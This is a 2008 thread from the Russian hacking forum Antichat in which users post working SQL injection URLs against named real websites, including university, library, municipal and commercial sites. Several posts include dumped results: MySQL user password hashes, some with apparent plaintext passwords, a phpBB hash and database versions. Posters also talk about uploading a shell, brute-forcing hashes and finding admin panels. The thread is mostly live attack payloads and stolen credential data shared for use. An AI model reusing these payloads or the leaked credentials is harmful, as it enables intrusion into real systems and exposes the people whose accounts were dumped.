Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

24.10.2008, 22:30
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
Dimi4
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,table_name))),2,3+from+informat ion_schema.tables+limit+17,1--
таблы..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,user,password))),2,3+from+mysql .user+limit+1,1--
рут..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,table_name,table_schema))),2,3+ from+information_schema.columns+where+column_name+ like+char(112,97,115,115,119,111,114,100)+limit+1, 1--
таблицы с паролями..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,username,user_password))),2,3+f rom+forum.phpbb_users+limit+2,1--
makarich: $H$93X6wK/iq5UvwhwhZXbbnU.RT7gb0W.
жаль так бы шелл залили..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+freeware32 .persons+limit+1,1--
пассы юзеров.. хешшированые.
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+persons+li mit+1,1--
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+admin+limi t+1,1--
админ.. кто разшефрует будет хорошо )
а вот и freeware32.ru/admin
Последний раз редактировалось sabe; 24.10.2008 в 22:55..
|
|
|

25.10.2008, 01:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
мда, там вообще не поймешь что:
Макаев Юрий Александрович:1$MgT.b/LSoOE
и админка все-равно защищена .htaccess
|
|
|

25.10.2008, 02:45
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
Сообщение от nonamez
Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))
Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.
Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.
|
|
|

25.10.2008, 03:03
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме: 463189
Репутация:
124
|
|
Сообщение от warlok
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.
http://www.lzs.lt/?lt=1185259934&article=1+union+select+concat_ws(0x 20,name,pass)+from+users+where+id=300/*
Бруть наздоровье.
|
|
|

25.10.2008, 10:35
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
продолжаем серию .edu ...
Sioux Falls Seminary(сам не знаю что это значит... =) )
Код:
http://www.sfseminary.edu/about/index.php?id=9&entryid=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15/*
PR=6
4.1.25-Debian_mt1
-----------------------------------------------------------------
Northwest University
Код:
http://www.northwestu.edu/calendar/view.php?id=-3151+union+select+1,2,3,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),5,6,7,8,9,10,11,12+from+mysql.user/*
PR=6
5.0.45-community-nt
mysql.user
root:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:loc alhost
devin.ellis:*001FD03A448FDAA34AE4EEC54A6269A02931D F74:chilen0:%
dennis.williams:*585198B8A7F5B514497FDE9FC1243891A 80020C8:ba1l3y00:%
odbc:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:%
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:lo calhost
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:%
Путь: W:\northwestu\calendar\view.php
-----------------------------------------------------------------
Х.З что...
Код:
http://www.art.uiowa.edu/directory.php?id=-44+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+18,1/*
PR=6
5.0.26-log
-----------------------------------------------------------------
Тоже х.з что...
Код:
https://cat.ipac.caltech.edu/sscconf07/view_abstract.php?id=-85+union+select+1,2,version(),4/*
5.0.27-standard
Последний раз редактировалось Iceangel_; 25.10.2008 в 11:55..
|
|
|

25.10.2008, 18:39
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме: 3103600
Репутация:
850
|
|
http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,10,12,13,14,15 ,16,17/*
5 поле
|
|
|

26.10.2008, 10:26
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 43
Провел на форуме: 120821
Репутация:
9
|
|
http://www.weightonline.com.au/products.php?pid=-89+UniON+Select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
версия 5.0.45-COMMUNITY
админки не нашёл(
|
|
|

26.10.2008, 10:30
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 43
Провел на форуме: 120821
Репутация:
9
|
|
http://www.winelistaustralia.com.au/wineShow.php?pid=1033'
инклудидтся, только админка прикрыта(
|
|
|

26.10.2008, 11:48
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
А не подскажите...
Можно ли провести тут инъекцию? И в какую сторону копать?
Код:
_http://la2.raid.ru/index.php?act=clan_info&id=1
|
|
|

26.10.2008, 12:26
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме: 1537850
Репутация:
536
|
|
Разные разности:
Код:
http://www.owensound.library.on.ca/news-full.php?NewsID=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/*
http://www.spec.bc.ca/news/news.php?newsID=999999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--
http://www.1049thebeach.ca/news_item.php?NewsID=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.nlc.bc.ca/public.news.php?NewsActiveList=newsdetails&NewsID=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.onlc.ca/newsfull.php?NewsID=999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
http://www.myheritage.es/FP/newsItem.php?s=786&newsID=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*&sourceList=dir
http://www.vibez.us/en/products/detail_mp3.php?pid=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&page=3
http://www.park-ridge.il.us/record.php?_ID=99999+union+select+1,concat_ws(0x3a,username,PASSWORD,ip),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+prkhome_ciab.ciab_member
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|